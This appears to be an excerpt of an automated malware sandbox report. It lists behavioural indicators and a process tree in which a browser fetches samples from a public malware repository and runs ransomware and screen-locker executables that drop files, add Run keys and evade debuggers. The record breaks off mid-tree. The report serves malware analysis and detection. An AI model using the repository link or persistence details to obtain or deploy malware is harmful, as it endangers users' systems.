Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE
Token: SeCreatePagefilePrivilege	3448	Explorer.EXE
Token: SeShutdownPrivilege	3448	Explorer.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe

Suspicious use of SendNotifyMessage 40 IoCs

Processes:

msedge.exe

pid	process
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe
2252	msedge.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

Explorer.EXEConhost.exeConhost.exeConhost.exemsedge.exe

pid	process
3448	Explorer.EXE
3448	Explorer.EXE
3448	Explorer.EXE
1104	Conhost.exe
3352	Conhost.exe
2340	Conhost.exe
2252	msedge.exe
3448	Explorer.EXE
3448	Explorer.EXE
3448	Explorer.EXE

Suspicious use of UnmapMainImage 1 IoCs

Processes:

RuntimeBroker.exe

pid process

3668 RuntimeBroker.exe

pid	process
3668	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2252 wrote to memory of 1980	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1980	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 1464	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2352	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2352	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe
PID 2252 wrote to memory of 2868	2252	msedge.exe	msedge.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2576

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2772

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/Ransomware/7ev3n.exe
2⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb8a0046f8,0x7ffb8a004708,0x7ffb8a004718
3⤵
PID:1980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
3⤵
PID:1464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
3⤵
PID:2868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
3⤵
PID:1640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
3⤵
PID:2444

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8
3⤵
PID:1064

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
3⤵
PID:1988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1
3⤵
PID:992

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
3⤵
PID:700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
3⤵
PID:3212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3012 /prefetch:2
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5612 /prefetch:8
3⤵
PID:688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
3⤵
PID:3800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6104 /prefetch:8
3⤵
PID:1316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1584

C:\Users\Admin\Downloads\satan.exe
"C:\Users\Admin\Downloads\satan.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3420

C:\Users\Admin\Downloads\satan.exe
"C:\Users\Admin\Downloads\satan.exe"
4⤵
- Executes dropped EXE
PID:4504

C:\Users\Admin\AppData\Roaming\Yvwiaw\efku.exe
"C:\Users\Admin\AppData\Roaming\Yvwiaw\efku.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1028

C:\Users\Admin\AppData\Roaming\Yvwiaw\efku.exe
"C:\Users\Admin\AppData\Roaming\Yvwiaw\efku.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:456

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_41a07d34.bat"
5⤵
PID:3128

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
3⤵
PID:3348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6400 /prefetch:8
3⤵
PID:2876

C:\Users\Admin\Downloads\satan.exe
"C:\Users\Admin\Downloads\satan.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2064

C:\Users\Admin\Downloads\satan.exe
"C:\Users\Admin\Downloads\satan.exe"
4⤵
- Executes dropped EXE
PID:4864

C:\Users\Admin\AppData\Roaming\Mial\xyigo.exe
"C:\Users\Admin\AppData\Roaming\Mial\xyigo.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1268

C:\Users\Admin\AppData\Roaming\Mial\xyigo.exe
"C:\Users\Admin\AppData\Roaming\Mial\xyigo.exe"
6⤵
- Executes dropped EXE
PID:3420

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp_fcb57942.bat"
5⤵
PID:4064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
3⤵
PID:4700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:8
3⤵
PID:2996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:1
3⤵
PID:4208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:8
3⤵
PID:3956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1868 /prefetch:1
3⤵
PID:1060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6420 /prefetch:8
3⤵
PID:4064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6404 /prefetch:8
3⤵
PID:1156

C:\Users\Admin\Downloads\Xyeta.exe
"C:\Users\Admin\Downloads\Xyeta.exe"
3⤵
- Executes dropped EXE
PID:1108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 448
4⤵
- Program crash
PID:4508

C:\Users\Admin\Downloads\Xyeta.exe
"C:\Users\Admin\Downloads\Xyeta.exe"
3⤵
- Executes dropped EXE
PID:5100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 416
4⤵
- Program crash
PID:784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
3⤵
PID:3136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5904 /prefetch:8
3⤵
PID:2468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:8
3⤵
PID:2624

C:\Users\Admin\Downloads\WinlockerVB6Blacksod.exe
"C:\Users\Admin\Downloads\WinlockerVB6Blacksod.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:4980

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\Downloads\WinlockerVB6Blacksod.exe SETUPEXEDIR=C:\Users\Admin\Downloads\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "
4⤵
- Enumerates connected drives
PID:4064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1868 /prefetch:1
3⤵
PID:1712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6444 /prefetch:8
3⤵
PID:4576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
3⤵
PID:556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,18170905886551537729,699562002755808043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6524 /prefetch:8
3⤵
PID:2900

C:\Users\Admin\Downloads\ViraLock.exe
"C:\Users\Admin\Downloads\ViraLock.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2604

C:\Users\Admin\BEsgsAUM\AwEkgEAU.exe
